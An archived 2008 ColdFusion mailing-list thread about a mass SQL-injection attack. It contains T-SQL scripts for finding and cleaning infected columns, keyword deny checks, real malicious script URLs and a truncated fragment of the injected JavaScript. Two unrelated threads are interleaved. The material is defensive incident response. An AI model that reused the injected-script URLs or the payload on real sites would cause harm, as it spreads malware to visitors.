If several people on this list are seeing this attack, it must be pretty widespread. Until now, I just check for strings http or user in url.id containing something else than an integer value. I now just added DECLARE in the validation. All my templates expecting id=some numeric start with this code (included): CFIF val(id) EQ 0 AND (id CONTAINS http OR id CONTAINS user OR id CONTAINS DECLARE) save IP of this guy in the banned addresses table... /CFIF This is even more efficient than CFQURYPARAM, because this way I'm sure the guy will not have another chance. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309368 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. === Yeah, that suck, I was going to dissect it. It appears that DNS is resolving it to 127.0.0.1. I didn't know you could do that. verynx.cn resolves to 121.12.169.186, but it returns a 404 when I submit a GET for w.js. Hmm, some off-shore joint. Asia Pacific Network Information Centre owns the IP the domain resolves to. Shows up as possibly being in Bejing, China. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309369 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. === Yeah, that suck, I was going to dissect it. It is broken now, but this morning I was able to see the code. Apparently all it was doing was to document.write some code containing an iFrame with an address to another Chinese site: http://ll80.com/. I've opened the site, but it is all Chinese for me ;-) -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309370 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Until now, I just check for strings http or user in url.id containing something else than an integer value. I now just added DECLARE in the validation. All my templates expecting id=some numeric start with this code (included): CFIF val(id) EQ 0 AND (id CONTAINS http OR id CONTAINS user OR id CONTAINS DECLARE) save IP of this guy in the banned addresses table... /CFIF This is even more efficient than CFQURYPARAM, because this way I'm sure the guy will not have another chance. That's fine, until the attack pattern contains something else, like Unicode sequences. Figuring out what patterns to deny is a losing battle. It's much more efficent to simply allow only acceptable actions, which is what CFQUERYPARAM does. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309371 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
For those of you who have been hit by this attack and who need to try something short of restoring your DB, this script will generate a series of update statements in reverse of the hack that's been going around: --- DECLARE @T varchar(255), @C varchar(255) DECLARE @sql varchar(4000) DECLARE @script varchar(255) /*fill in the value of the malicious script. */ select @script = 'script src=*scriptsrc/script!---' DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T, @C WHILE (@@FETCH_STATUS = 0) BEGIN SELECT @sql = 'update [' + @T +'] set ['+ @C +'] = Replace([' + @C + '],''' + @script + ''',)' PRINT @sql /*uncomment this after checking the output using print */ --EXEC(@sql) FETCH NEXT FROM Table_Cursor INTO @T, @C END CLOSE Table_Cursor DEALLOCATE Table_Cursor --- 1) Replace the value of @script (the select at the top) with the value of the string that's been inserted into your DB 2) Run the script AS IS - you should see a list of update statements that look like this: update [**tablename] set [**columnName] = Replace([**ColumnName],'script src=*scriptsrc/script!---','') Where **tablename and **columname represent actual tables/columns from your DB. You can then run the updates individually to strip out the malicious code... I also converted the update to a select to compare the values and see what the result would be on update. 3) If you are brave you can comment out the EXEC(@sql) line and rerun the script. Doing so will hit every table and every char column with these updates so be sure you know what you are doing. -Mark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309372 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Dave... What other ways are there? I know of two: EXEC and EXECUTE. -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 1:05 PM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Even easier than monkeying with every single one of your cfquery's just add following line to the TOP of all your application.cfm's: cfif cgi.SCRIPT_NAME contains EXEC( OR cgi.PATH_INFO contains EXEC( OR cgi.QUERY_STRING contains EXEC(cfabort/cfif That would stop this specific problem, but would be easily circumvented by using one of the other mechanisms for executing strings on SQL Server. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309373 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Just an FYI...
Our DBA (Ryan Cooper) took this same route and this is what he came up with.
Thought I'd share this with the group on his behalf. He notes that you need
to run this on each of your databases:
-- start
CREATE TABLE [dbo].[Infected](
[TableName] [varchar](255) NULL,
[ColumnName] [varchar](4000) NULL
);
DECLARE @T nvarchar(255)
DECLARE @C nvarchar(4000)
DECLARE @SQL nvarchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,
b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99
or b.xtype=35
or b.xtype=231
or b.xtype=167)
open Table_Cursor
fetch next from Table_Cursor into @T,@C
while @@fetch_status = 0
begin
set @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; SELECT
TOP 1 @V = ' + @C + ' FROM ' + @T + ' WHERE '[EMAIL PROTECTED]' LIKE
''%/titlescript
src=http://1.verynx.cn/w.js;%''; IF (@V IS NOT NULL) BEGIN INSERT INTO
dbo.Infected (tableName, ColumnName) VALUES ('''[EMAIL PROTECTED]''','''[EMAIL
PROTECTED]''') END'
PRINT @SQL
EXECUTE sp_executesql @SQL
fetch next from Table_Cursor into @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- end
-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 1:49 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
The hacker's hope is that you will be outputting one of those varchar fields
into a webpage without escaping HTML characters. The extra text being
inserted into the database fields will include a malicious JavaScript file
from another server into the webpage. I haven't looked at the JS to see
what it does, but it probably tries to load some Trojan via an active X
applet or something.
To clean your database, I would recommend reverse-engineering the attack to
loop over your database columns and remove the text they placed in there.
In the mean time, shut your site down so you don't infect your customers.
~Brad
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309374
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I took the time to save out all of the code from the JS file that was inserted. Anyone that would like this code, please contact me off list and I'll be happy to zip it up for you. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 2:25 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. === Yeah, that suck, I was going to dissect it. It is broken now, but this morning I was able to see the code. Apparently all it was doing was to document.write some code containing an iFrame with an address to another Chinese site: http://ll80.com/. I've opened the site, but it is all Chinese for me ;-) -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309375 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
We're getting hit with this attack via a wide range of hosted domains, and various files. Sitemap.cfm is a common one at this point. andy -Original Message- From: Gerald Guido [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 12:02 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... We're getting hit hard today with this. /rss.cfm? Is is just rss.cfm? I haven't looked at our logs yet. Where did you see this. The server log files? ~~G~~ On Mon, Jul 21, 2008 at 12:53 PM, Kris Jones [EMAIL PROTECTED] wrote: We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309376 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Brad/dave, Back when it was working the script did little more than insert a link inot the page that sent the user to a tageted links site/page... In other words it was a basic spam traffic generator - at least the ones on our sites. -mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 2:08 PM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. === Yeah, that suck, I was going to dissect it. It appears that DNS is resolving it to 127.0.0.1. I didn't know you could do that. verynx.cn resolves to 121.12.169.186, but it returns a 404 when I submit a GET for w.js. Hmm, some off-shore joint. Asia Pacific Network Information Centre owns the IP the domain resolves to. Shows up as possibly being in Bejing, China. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309377 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
That's fine, until the attack pattern contains something else, like Unicode sequences. Not from the same address though, because it is banned now. And the purpose of my code is not to replace CFQUERYPARAM. It is to add an extra feature that will not only protect the database, but ALSO the whole site, because the guy won't be able to open any other page. Figuring out what patterns to deny is a losing battle. Look at what CFQUERYPARAM CFSQLType = CF_SQL_INTEGER ... does: It triggers an error if the parameter is not an integer. My code does exactly the same thing, PLUS it bans the intruder in case some known attack pattern is detected. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309378 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
And embedded in his code is one of the other ways of executing SQL - using
sp_executeSQL His script is better than mine I think.
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
-Original Message-
From: Andy Matthews [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 2:37 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Just an FYI...
Our DBA (Ryan Cooper) took this same route and this is what he came up with.
Thought I'd share this with the group on his behalf. He notes that you need
to run this on each of your databases:
-- start
CREATE TABLE [dbo].[Infected](
[TableName] [varchar](255) NULL,
[ColumnName] [varchar](4000) NULL
);
DECLARE @T nvarchar(255)
DECLARE @C nvarchar(4000)
DECLARE @SQL nvarchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,
b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99
or b.xtype=35
or b.xtype=231
or b.xtype=167)
open Table_Cursor
fetch next from Table_Cursor into @T,@C
while @@fetch_status = 0
begin
set @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; SELECT
TOP 1 @V = ' + @C + ' FROM ' + @T + ' WHERE '[EMAIL PROTECTED]' LIKE
''%/titlescript
src=http://1.verynx.cn/w.js;%''; IF (@V IS NOT NULL) BEGIN INSERT INTO
dbo.Infected (tableName, ColumnName) VALUES ('''[EMAIL PROTECTED]''','''[EMAIL
PROTECTED]''') END'
PRINT @SQL
EXECUTE sp_executesql @SQL
fetch next from Table_Cursor into @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- end
-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 1:49 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
The hacker's hope is that you will be outputting one of those varchar fields
into a webpage without escaping HTML characters. The extra text being
inserted into the database fields will include a malicious JavaScript file
from another server into the webpage. I haven't looked at the JS to see
what it does, but it probably tries to load some Trojan via an active X
applet or something.
To clean your database, I would recommend reverse-engineering the attack to
loop over your database columns and remove the text they placed in there.
In the mean time, shut your site down so you don't infect your customers.
~Brad
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309379
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
What other ways are there? I know of two: EXEC and EXECUTE http (http injection) and user (SQL injection) are classics. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309380 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I'm just talking about executing SQL, not SQL injection methods. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 2:41 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... What other ways are there? I know of two: EXEC and EXECUTE http (http injection) and user (SQL injection) are classics. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309381 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
cfpod overflow in IE
Good day! I'm having a problem with the cfpod tag in coldfusion 8 - seems to be an issue in IE only. When the pod contents exceed the pod's defined width, Firefox correctly maintains the width of the pod and adds a horizontal scroll bar to the bottom of the pod. IE, on the other hand, displays the full width of the content, causing the pod body to be wider than it should be (although the header maintains the defined width.) The culprit in IE appears to be the 'ypod' class on the 1st div that coldfusion generates - it has an inline style which includes an overflow: visible; attribute. If I change that in the generated code so that first div has overflow:auto and view with IE, it looks the way it should, i.e. it stays within the defined pod boundaries. Any ideas on how I can override this to get pods to display correctly in IE? Here is some sample coldfusion code that demonstrates the problem: this is a test of pod size cfpod name=test overflow=auto width=100 height=100 title=Test Pod div style=width:200px test - this is a test of a long line in a small pod /div /cfpod ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309382 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
.and all hackers ALWAYS use the same IPcause they'd never get caught that way...hehe yes...that was meant to be sarcastic ;-) I see where you're coming from Claude, I just think (as Dave appears to) that you're wasting your timelet CFQUERYPARAM do what it's meant to. Cheers - Bryan Stevenson B.Comm. VP Director of E-Commerce Development Electric Edge Systems Group Inc. phone: 250.480.0642 fax: 250.480.1264 cell: 250.920.8830 e-mail: [EMAIL PROTECTED] web: www.electricedgesystems.com Notice: This message, including any attachments, is confidential and may contain information that is privileged or exempt from disclosure. It is intended only for the person to whom it is addressed unless expressly authorized otherwise by the sender. If you are not an authorized recipient, please notify the sender immediately and permanently destroy all copies of this message and attachments. On Mon, 2008-07-21 at 15:39 -0400, Claude Schneegans wrote: That's fine, until the attack pattern contains something else, like Unicode sequences. Not from the same address though, because it is banned now. And the purpose of my code is not to replace CFQUERYPARAM. It is to add an extra feature that will not only protect the database, but ALSO the whole site, because the guy won't be able to open any other page. Figuring out what patterns to deny is a losing battle. Look at what CFQUERYPARAM CFSQLType = CF_SQL_INTEGER ... does: It triggers an error if the parameter is not an integer. My code does exactly the same thing, PLUS it bans the intruder in case some known attack pattern is detected. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309383 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
For me, all attempts are focusing on rss.cfm. Another post said they saw sitemap.cfm being hit. Can anyone confirm any other templates that are being hit? Perhaps only 'commonly named' templates are being hit? Che ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309384 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Easy. sp_executesql The point here is, you can spend a lifetime guessing every bad way a hacker can ruin your database. The root cause however is that your input is not bound to a parameter in your SQL statement. Cfqueryparam closes that hole for good. Whether you want to ban people IPs a and junk us up to you, but that can be a slipperly slope when you start banning legit people because they typed the word execute into a comments form. ~Brad -Original Message- From: Andy Matthews [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 2:47 PM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... I'm just talking about executing SQL, not SQL injection methods. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309385 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I have all of the js files open and saved to a text file, fwiw, from this morning. On Mon, Jul 21, 2008 at 3:24 PM, Claude Schneegans [EMAIL PROTECTED] wrote: For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. === Yeah, that suck, I was going to dissect it. It is broken now, but this morning I was able to see the code. Apparently all it was doing was to document.write some code containing an iFrame with an address to another Chinese site: http://ll80.com/. I've opened the site, but it is all Chinese for me ;-) ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309386 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
We've been dealing with these too - to address Che's question they were crawling here for pages with query strings but not much else - as well as our implementing solutions offered here (much appreciation to all), our net. admin. simply shut down these attacks at the firewall - Sonicwall is the name of our firewall and it apparently updates every ten minutes to include defenses against things like this. Our logs are very clean now - although DB's a mess. :-) N.A. left for the day before I got back to email but I will attempt to discover what he did and post here. HTH Mark Che Vilnonis wrote: For me, all attempts are focusing on rss.cfm. Another post said they saw sitemap.cfm being hit. Can anyone confirm any other templates that are being hit? Perhaps only 'commonly named' templates are being hit? Che ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309387 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
The attempts are based on a google search of .cfm files with parameters that can be exploited. (They have automated the page search, as well as the attack itself.) It is not a cf specific attack, but is also nailing php, asp, and .net sites. Here is a decent writeup of it all. http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx On Mon, Jul 21, 2008 at 4:05 PM, Che Vilnonis [EMAIL PROTECTED] wrote: For me, all attempts are focusing on rss.cfm. Another post said they saw sitemap.cfm being hit. Can anyone confirm any other templates that are being hit? Perhaps only 'commonly named' templates are being hit? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309388 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Mystery Character
Does anyone know the character code for this character: . My Mac users are uploading files with this character and it does not work in a URL string... I'd kill it but I don't know what character it is. Using . in a regex replace does not work. Robert B. Harrison Director of Interactive services Austin Williams 125 Kennedy Drive, Suite 100 Hauppauge NY 11788 T : 631.231.6600 Ext. 119 F : 631.434.7022 www.austin-williams.com Great advertising can't be either/or... It must be . ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309389 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Mystery Character
NO. The character got converted to a period. It looks like a bullet. Robert B. Harrison Director of Interactive services Austin Williams 125 Kennedy Drive, Suite 100 Hauppauge NY 11788 T : 631.231.6600 Ext. 119 F : 631.434.7022 www.austin-williams.com Great advertising can't be either/or... It must be . -Original Message- From: Robert Harrison [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 4:17 PM To: CF-Talk Subject: Mystery Character Does anyone know the character code for this character: . My Mac users are uploading files with this character and it does not work in a URL string... I'd kill it but I don't know what character it is. Using . in a regex replace does not work. Robert B. Harrison Director of Interactive services Austin Williams 125 Kennedy Drive, Suite 100 Hauppauge NY 11788 T : 631.231.6600 Ext. 119 F : 631.434.7022 www.austin-williams.com Great advertising can't be either/or... It must be . ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309390 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
We got hit, and, according to the IIS logs, they hit non-standard templates in varied directories: /indexPrint.cfm /events/institute.cfm /search/TaxonomyResults.cfm /conferences/article.cfm /applications/statsmap/detail.cfm I don't see much of a pattern. Cameron For me, all attempts are focusing on rss.cfm. Another post said they saw sitemap.cfm being hit. Can anyone confirm any other templates that are being hit? Perhaps only 'commonly named' templates are being hit? Che ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309391 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Mystery Character
Robert, Can't see the character, but check out http://www.asciitable.com and see if you can find it there. Dave -Original Message- From: Robert Harrison [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 3:17 PM To: CF-Talk Subject: Mystery Character Does anyone know the character code for this character: . My Mac users are uploading files with this character and it does not work in a URL string... I'd kill it but I don't know what character it is. Using . in a regex replace does not work. Robert B. Harrison Director of Interactive services Austin Williams 125 Kennedy Drive, Suite 100 Hauppauge NY 11788 T : 631.231.6600 Ext. 119 F : 631.434.7022 www.austin-williams.com Great advertising can't be either/or... It must be . ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309392 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I can confirm that many templates in our site are being hit. And they are not commonly named. -KJ For me, all attempts are focusing on rss.cfm. Another post said they saw sitemap.cfm being hit. Can anyone confirm any other templates that are being hit? Perhaps only 'commonly named' templates are being hit? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309393 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Yeah, that suck, I was going to dissect it. It appears that
DNS is resolving it to 127.0.0.1. I didn't know you could do
that. verynx.cn resolves to 121.12.169.186, but it returns a
404 when I submit a GET for w.js.
Here's a sample, from another .js file used:
window.status=;
n=navigator.userLanguage.toUpperCase();
if((n!=ZH-CN)(n!=UR)(n!=RU)(n!=KO)(n!=ZH-TW)(n!=ZH)(
n!=HI)(n!=TH)(n!=UR)(n!=VI)){
